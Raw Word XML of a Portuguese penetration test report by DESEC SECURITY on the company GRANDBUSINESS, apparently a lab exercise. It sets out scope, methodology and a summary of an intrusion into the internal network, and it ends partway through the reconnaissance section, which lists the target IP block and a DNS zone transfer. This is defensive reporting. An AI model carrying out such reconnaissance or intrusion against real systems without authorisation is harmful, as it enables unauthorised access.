          <w:p w14:paraId="239A5EC8" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="005A2E4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ED">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>www.</w:t>
            </w:r>
            <w:r w:rsidR="002E5EAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>grandbusiness</w:t>
            </w:r>
            <w:r w:rsidRPr="003C50ED">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.com.br</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="604C0AA3" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="001A49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4100BB" w14:textId="77777777" w:rsidR="002B7D58" w:rsidRPr="003C50ED" w:rsidRDefault="002B7D58" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A CONTRATANTE deu liberdade para que o teste inicie a partir da URL e tem conhecimento que a CONTRATADA tem permissão de acessar </w:t>
      </w:r>
      <w:r w:rsidR="004933EB" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seus ativos (</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>servidores e serviços</w:t>
      </w:r>
      <w:r w:rsidR="004933EB" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> internos desde que o ataque tenha sido iniciado através da URL principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5E6E4" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O objetivo deste </w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TESTE DE INTRUSÃO</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> do tipo </w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BLACKBOX</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é conduzir uma simulação de ataque malicioso da maneira que seja possível determinar o impacto que as falhas de segurança possam apresentar na:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B379451" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="001A49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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Na Integridade dos sistemas da companhia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41B8F3" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="001A49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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Na confidencialidade das informações de clientes</w:t>
      </w:r>
      <w:r w:rsidR="004933EB" w:rsidRPr="003C50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610DBA" w14:textId="77777777" w:rsidR="00C95713" w:rsidRPr="003C50ED" w:rsidRDefault="00C95713" w:rsidP="001A49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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Na infraestrutura interna e disponibilidade dos sistemas e serviços</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78589566" w14:textId="77777777" w:rsidR="00C9795C" w:rsidRDefault="00C9795C" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O resultado dessa avaliação deve ser usado para mitigação dessas falhas a fim de minimizar os riscos e melhorar a segurança.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79685B91" w14:textId="77777777" w:rsidR="005A2E4A" w:rsidRDefault="005A2E4A" w:rsidP="001A49AA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38DD113" w14:textId="77777777" w:rsidR="005A2E4A" w:rsidRDefault="005A2E4A" w:rsidP="001A49AA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29A8211" w14:textId="77777777" w:rsidR="005A2E4A" w:rsidRPr="003C50ED" w:rsidRDefault="005A2E4A" w:rsidP="001A49AA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C7CC0E8" w14:textId="77777777" w:rsidR="002B7D58" w:rsidRPr="005A2E4A" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA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- </w:t>
      </w:r>
      <w:r w:rsidR="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Limitações de Escopo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901725A" w14:textId="77777777" w:rsidR="00770FF4" w:rsidRPr="003C50ED" w:rsidRDefault="00C9795C" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>limitações</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> impostas pela CONTRATANTE foram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CBA05" w14:textId="77777777" w:rsidR="00C9795C" w:rsidRPr="003C50ED" w:rsidRDefault="00C9795C" w:rsidP="001A49A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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataques </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C50E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C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Negação de Serviço) (visto que outra empresa presta suporte a disponibilidade de seus sistemas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC904B1" w14:textId="77777777" w:rsidR="00C9795C" w:rsidRPr="003C50ED" w:rsidRDefault="00C9795C" w:rsidP="001A49A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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ataques de Engenharia Social (pois objetivo principal da contratante é medir o nível de segurança de seu ambiente sem depender do fator</w:t>
      </w:r>
      <w:r w:rsidR="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> erro humano)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C5E0F5" w14:textId="77777777" w:rsidR="002B7D58" w:rsidRPr="005A2E4A" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA">
      <w:p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- </w:t>
      </w:r>
      <w:r w:rsidR="002B7D58" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Responsabilidad</w:t>
      </w:r>
      <w:r w:rsidR="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="002B7D58" w:rsidRPr="005A2E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053C4A2" w14:textId="77777777" w:rsidR="00C9795C" w:rsidRPr="003C50ED" w:rsidRDefault="002B7D58" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O trabalho desenvolvido pela </w:t>
      </w:r>
      <w:r w:rsidR="005A2E4A" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DESEC SECURITY </w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>não</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tem como objetivo corrigir as possíveis vulnerabilidades, nem proteger a CONTRATANTE contra ataques internos e externos, nosso objetivo é fazer um levantamento dos riscos e recomendar formas para minimiza-los.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AB6C71" w14:textId="77777777" w:rsidR="002B7D58" w:rsidRPr="003C50ED" w:rsidRDefault="002B7D58" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As recomendações sugeridas neste relatório devem ser testadas e validadas pela equipe técnica da empresa CONTRATANTE antes de serem implantadas em ambiente em produção. A DESEC SECURITY </w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>não se responsabiliza</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pela implantação e possíveis impactos que possam vir a ocorrer em outras aplicações ou serviços.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436C12FA" w14:textId="77777777" w:rsidR="004933EB" w:rsidRPr="00DA015F" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA">
      <w:p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 - </w:t>
      </w:r>
      <w:r w:rsidR="004933EB" w:rsidRPr="00DA015F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Metodologia </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420D830" w14:textId="77777777" w:rsidR="00685FFB" w:rsidRDefault="00685FFB" w:rsidP="00685FFB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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A metodologia utilizada neste teste visa analisar os níveis de proteção implantados, iniciando sem nenhuma informação disponibilizada pela empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B127B56" w14:textId="567FF047" w:rsidR="00685FFB" w:rsidRPr="003C50ED" w:rsidRDefault="00685FFB" w:rsidP="00685FFB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este se inicia na fase de </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COLETA DE INFORMAÇÕES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, onde se colhe informações publicas sobre alvo, depois passamos para a fase de reconhecimento e identificação da aplicação, onde identificamos versões de software, tipo dos sistemas, arquitetura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, após isso iniciamos uma varredura manual para encontrar possíveis vetores de entrada e posteriormente planejarmos o ataque</w:t>
      </w:r>
      <w:r w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, somente após esse reconhecimento se inicia a fase de detecção de vulnerabilidades e posteriormente a exploração e pós-exploração e validação do risco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F125A2D" w14:textId="77777777" w:rsidR="00BB0152" w:rsidRPr="003C50ED" w:rsidRDefault="00BB0152" w:rsidP="001A49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1A3235" w14:textId="77777777" w:rsidR="001A49AA" w:rsidRPr="003C50ED" w:rsidRDefault="001A49AA" w:rsidP="001A49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050E7D" w14:textId="77777777" w:rsidR="00D82358" w:rsidRPr="00DA015F" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA">
      <w:p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- </w:t>
      </w:r>
      <w:r w:rsidR="00D17DBD" w:rsidRPr="00DA015F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sumá</w:t>
      </w:r>
      <w:r w:rsidR="00D82358" w:rsidRPr="00DA015F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">rio </w:t>
      </w:r>
      <w:r w:rsidR="006C0750" w:rsidRPr="00DA015F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>executivo</w:t>
      </w:r>
      <w:r w:rsidR="00770FF4" w:rsidRPr="00DA01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09DFB3" w14:textId="5021D424" w:rsidR="00685FFB" w:rsidRDefault="00D17DBD" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Os resultados das avaliações efetuadas na aplicação a partir da internet, demonstram que a empresa possui sérios riscos de segurança no qual </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a presença de vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidR="00776B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A" w:rsidRPr="00685FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GRAVES</w:t>
      </w:r>
      <w:r w:rsidR="00776B5A" w:rsidRPr="00DA01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B5A" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>compromete</w:t>
      </w:r>
      <w:r w:rsidR="0063357F" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> o sigilo de informações sensíveis e a imagem da empresa </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GRANDBUSINESS</w:t>
      </w:r>
      <w:r w:rsidR="0063357F" w:rsidRPr="003C50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7AD78" w14:textId="77777777" w:rsidR="00AA6292" w:rsidRPr="00DA015F" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA">
      <w:p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- </w:t>
      </w:r>
      <w:r w:rsidR="00AA6292" w:rsidRPr="00DA015F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Resumo das ameaças</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0926AD76" w14:textId="5F890FAF" w:rsidR="00AA6292" w:rsidRDefault="00AA6292" w:rsidP="001A49AA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50ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Através </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">da internet foi possível localizar uma aplicação vulnerável que permitiu acesso a rede interna, comprometendo uma estação de trabalho e conseguindo posteriormente acesso ao servidor principal da rede. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD94BAE" w14:textId="77777777" w:rsidR="00DA015F" w:rsidRPr="003C50ED" w:rsidRDefault="00DA015F" w:rsidP="001A49AA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B4C6DF" w14:textId="77777777" w:rsidR="008D2AB5" w:rsidRDefault="008D2AB5" w:rsidP="008D2AB5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FB0AF6" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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E06F77" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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20D183" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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129203" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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786E02" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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21124D" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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C7EA10" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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6B5CB4" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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D026A7" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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67B686" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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D21536" w14:textId="77777777" w:rsidR="00445F1F" w:rsidRPr="003C50ED" w:rsidRDefault="00445F1F" w:rsidP="008D2AB5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2A5EC1D" w14:textId="77777777" w:rsidR="00420C12" w:rsidRPr="0075030A" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA">
      <w:p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- </w:t>
      </w:r>
      <w:r w:rsidR="00420C12" w:rsidRPr="0075030A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Resultado do Trabalho - Analise Técnica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725FEF32" w14:textId="4C338369" w:rsidR="0063357F" w:rsidRDefault="00B07E0E" w:rsidP="001A49AA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 </w:t>
      </w:r>
      <w:r w:rsidR="00776B5A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B5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Coleta de Informação</w:t>
      </w:r>
      <w:r w:rsidR="00B16B70" w:rsidRPr="00B16B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2CA8A6" w14:textId="1ADA1466" w:rsidR="00940DE4" w:rsidRDefault="00706CB3" w:rsidP="00706CB3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iamos a coleta de informação do ambiente afim de levantar informações sobre o ambiente.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00940DE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">o domínio </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00940DE4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szCs w:val="24"/>
          </w:rPr>
          <w:t>www.grandbusiness.com.br</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00940D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spondia para o IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00940DE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>173.45.93.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e ao fazer uma pesquisa por IP descobrimos o bloco de IP de propriedade do GRANDBUSINESS.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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00940DE4" w14:paraId="6263C76C" w14:textId="77777777" w:rsidTr="0094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14:paraId="57EE0C89" w14:textId="2A8CC809" w:rsidR="00940DE4" w:rsidRDefault="00940DE4" w:rsidP="00940DE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DE4">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>173.45.93.16 - 173.45.93.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10B050FC" w14:textId="77777777" w:rsidR="00B876B2" w:rsidRDefault="00706CB3" w:rsidP="00B876B2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B876B2" w:rsidRPr="00B876B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Consultando o DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9390DA" w14:textId="7A66FE02" w:rsidR="00B876B2" w:rsidRDefault="00B876B2" w:rsidP="00940DE4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ervidor de DNS permitia a realização da </w:t>
      </w:r>
      <w:r w:rsidR="00E02FC1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Transferência</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
